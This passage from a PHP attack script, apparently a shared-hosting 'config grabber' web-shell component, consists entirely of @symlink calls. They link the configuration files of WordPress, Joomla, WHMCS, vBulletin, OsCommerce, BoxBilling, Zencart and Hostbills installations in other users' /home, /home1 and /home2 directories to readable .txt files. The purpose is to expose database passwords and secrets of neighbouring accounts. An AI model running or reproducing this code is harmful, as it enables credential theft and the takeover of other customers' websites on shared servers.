  1117. @symlink('/home/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1118. @symlink('/home/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1119. @symlink('/home/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1120. @symlink('/home/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1121. @symlink('/home/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1122. @symlink('/home/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1123. @symlink('/home/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1124. @symlink('/home/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1125. @symlink('/home/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1126. @symlink('/home/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1127. @symlink('/home/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1128. @symlink('/home/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1129. @symlink('/home/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1130. @symlink('/home/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1131. @symlink('/home/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1132. @symlink('/home/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1133. @symlink('/home/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1134.  
  1135. //Home1
  1136.  
  1137. @symlink('/home1/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1138. @symlink('/home1/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1139. @symlink('/home1/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1140. @symlink('/home1/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1141. @symlink('/home1/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1142. @symlink('/home1/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1143. @symlink('/home1/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1144. @symlink('/home1/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1145. @symlink('/home1/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1146. @symlink('/home1/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1147. @symlink('/home1/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1148. @symlink('/home1/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1149. @symlink('/home1/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1150. @symlink('/home1/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1151. @symlink('/home1/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1152. @symlink('/home1/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1153. @symlink('/home1/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1154. @symlink('/home1/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1155. @symlink('/home1/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1156. @symlink('/home1/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1157. @symlink('/home1/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1158. @symlink('/home1/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1159. @symlink('/home1/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1160. @symlink('/home1/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1161. @symlink('/home1/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1162. @symlink('/home1/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1163. @symlink('/home1/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1164. @symlink('/home1/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1165. @symlink('/home1/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1166. @symlink('/home1/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1167. @symlink('/home1/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1168. @symlink('/home1/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1169. @symlink('/home1/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1170. @symlink('/home1/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1171. @symlink('/home1/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1172. @symlink('/home1/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1173. @symlink('/home1/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1174. @symlink('/home1/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1175. @symlink('/home1/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1176. @symlink('/home1/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1177. @symlink('/home1/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1178. @symlink('/home1/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1179. @symlink('/home1/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1180. @symlink('/home1/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1181. @symlink('/home1/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1182. @symlink('/home1/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1183. @symlink('/home1/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1184. @symlink('/home1/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1185. @symlink('/home1/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1186. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1187. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1188. @symlink('/home1/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1189. @symlink('/home1/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1190. @symlink('/home1/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1191. @symlink('/home1/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1192. @symlink('/home1/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1193. @symlink('/home1/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1194. @symlink('/home1/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1195. @symlink('/home1/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1196. @symlink('/home1/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1197. @symlink('/home1/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1198. @symlink('/home1/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1199. @symlink('/home1/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1200. @symlink('/home1/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1201. @symlink('/home1/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1202. @symlink('/home1/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1203. @symlink('/home1/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1204. @symlink('/home1/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1205. @symlink('/home1/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1206. @symlink('/home1/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1207. @symlink('/home1/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1208. @symlink('/home1/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1209. @symlink('/home1/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1210. @symlink('/home1/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1211. @symlink('/home1/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1212. @symlink('/home1/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1213. @symlink('/home1/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1214. @symlink('/home1/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1215. @symlink('/home1/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1216. @symlink('/home1/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1217. @symlink('/home1/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1218. @symlink('/home1/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1219. @symlink('/home1/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1220. @symlink('/home1/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1221. @symlink('/home1/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1222. @symlink('/home1/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1223. @symlink('/home1/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1224. @symlink('/home1/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1225. @symlink('/home1/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1226. @symlink('/home1/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1227. @symlink('/home1/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1228. @symlink('/home1/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1229. @symlink('/home1/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1230. @symlink('/home1/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1231. @symlink('/home1/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1232. @symlink('/home1/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1233. @symlink('/home1/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1234. @symlink('/home1/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1235. @symlink('/home1/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1236. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1237. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1238. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1239. @symlink('/home1/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1240. @symlink('/home1/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1241. @symlink('/home1/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1242. @symlink('/home1/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1243. @symlink('/home1/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1244. @symlink('/home1/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1245. @symlink('/home1/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1246. @symlink('/home1/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1247. @symlink('/home1/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1248. @symlink('/home1/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1249. @symlink('/home1/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1250. @symlink('/home1/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1251. @symlink('/home1/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1252. @symlink('/home1/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1253. @symlink('/home1/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1254. @symlink('/home1/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1255. @symlink('/home1/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1256. @symlink('/home1/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1257. @symlink('/home1/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1258. @symlink('/home1/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1259. @symlink('/home1/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1260. @symlink('/home1/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1261. @symlink('/home1/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1262. @symlink('/home1/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1263. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1264. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1265. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1266. @symlink('/home1/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1267. @symlink('/home1/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1268. @symlink('/home1/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1269. @symlink('/home1/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1270. @symlink('/home1/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1271. @symlink('/home1/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1272. @symlink('/home1/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1273. @symlink('/home1/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1274. @symlink('/home1/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1275. @symlink('/home1/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1276. @symlink('/home1/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1277. @symlink('/home1/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1278. @symlink('/home1/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1279. @symlink('/home1/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1280. @symlink('/home1/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1281. @symlink('/home1/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1282. @symlink('/home1/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1283. @symlink('/home1/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1284. @symlink('/home1/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1285. @symlink('/home1/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1286. @symlink('/home1/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1287. @symlink('/home1/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1288. @symlink('/home1/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1289. @symlink('/home1/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1290. @symlink('/home1/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1291. @symlink('/home1/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1292. @symlink('/home1/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1293. @symlink('/home1/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1294. @symlink('/home1/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1295. @symlink('/home1/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1296. @symlink('/home1/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1297. @symlink('/home1/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1298. @symlink('/home1/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1299. @symlink('/home1/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1300. @symlink('/home1/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1301. @symlink('/home1/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1302. @symlink('/home1/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1303. @symlink('/home1/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1304. @symlink('/home1/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1305. @symlink('/home1/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1306. @symlink('/home1/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1307. @symlink('/home1/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1308. @symlink('/home1/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1309. @symlink('/home1/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1310. @symlink('/home1/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1311. @symlink('/home1/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1312. @symlink('/home1/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1313. @symlink('/home1/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1314. @symlink('/home1/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1315. @symlink('/home1/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1316. @symlink('/home1/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1317.  
  1318. //Home2
  1319.  
  1320. @symlink('/home2/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1321. @symlink('/home2/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1322. @symlink('/home2/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1323. @symlink('/home2/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1324. @symlink('/home2/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1325. @symlink('/home2/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1326. @symlink('/home2/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1327. @symlink('/home2/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1328. @symlink('/home2/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1329. @symlink('/home2/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1330. @symlink('/home2/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1331. @symlink('/home2/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1332. @symlink('/home2/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1333. @symlink('/home2/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1334. @symlink('/home2/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1335. @symlink('/home2/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1336. @symlink('/home2/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1337. @symlink('/home2/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1338. @symlink('/home2/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1339. @symlink('/home2/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1340. @symlink('/home2/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1341. @symlink('/home2/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1342. @symlink('/home2/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1343. @symlink('/home2/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1344. @symlink('/home2/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1345. @symlink('/home2/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1346. @symlink('/home2/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1347. @symlink('/home2/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1348. @symlink('/home2/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1349. @symlink('/home2/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1350. @symlink('/home2/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1351. @symlink('/home2/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1352. @symlink('/home2/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1353. @symlink('/home2/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1354. @symlink('/home2/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1355. @symlink('/home2/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1356. @symlink('/home2/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1357. @symlink('/home2/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1358. @symlink('/home2/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1359. @symlink('/home2/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1360. @symlink('/home2/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1361. @symlink('/home2/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1362. @symlink('/home2/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1363. @symlink('/home2/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1364. @symlink('/home2/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1365. @symlink('/home2/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1366. @symlink('/home2/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1367. @symlink('/home2/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1368. @symlink('/home2/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1369. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1370. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1371. @symlink('/home2/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1372. @symlink('/home2/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1373. @symlink('/home2/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1374. @symlink('/home2/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1375. @symlink('/home2/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1376. @symlink('/home2/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1377. @symlink('/home2/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1378. @symlink('/home2/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1379. @symlink('/home2/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1380. @symlink('/home2/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1381. @symlink('/home2/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1382. @symlink('/home2/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1383. @symlink('/home2/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1384. @symlink('/home2/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1385. @symlink('/home2/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1386. @symlink('/home2/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1387. @symlink('/home2/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1388. @symlink('/home2/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1389. @symlink('/home2/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1390. @symlink('/home2/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1391. @symlink('/home2/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1392. @symlink('/home2/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1393. @symlink('/home2/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1394. @symlink('/home2/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1395. @symlink('/home2/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1396. @symlink('/home2/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1397. @symlink('/home2/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1398. @symlink('/home2/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1399. @symlink('/home2/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1400. @symlink('/home2/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1401. @symlink('/home2/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1402. @symlink('/home2/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1403. @symlink('/home2/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1404. @symlink('/home2/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1405. @symlink('/home2/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1406. @symlink('/home2/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1407. @symlink('/home2/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1408. @symlink('/home2/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1409. @symlink('/home2/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1410. @symlink('/home2/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1411. @symlink('/home2/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1412. @symlink('/home2/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1413. @symlink('/home2/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1414. @symlink('/home2/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1415. @symlink('/home2/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1416. @symlink('/home2/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1417. @symlink('/home2/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1418. @symlink('/home2/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1419. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1420. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1421. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1422. @symlink('/home2/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1423. @symlink('/home2/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1424. @symlink('/home2/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
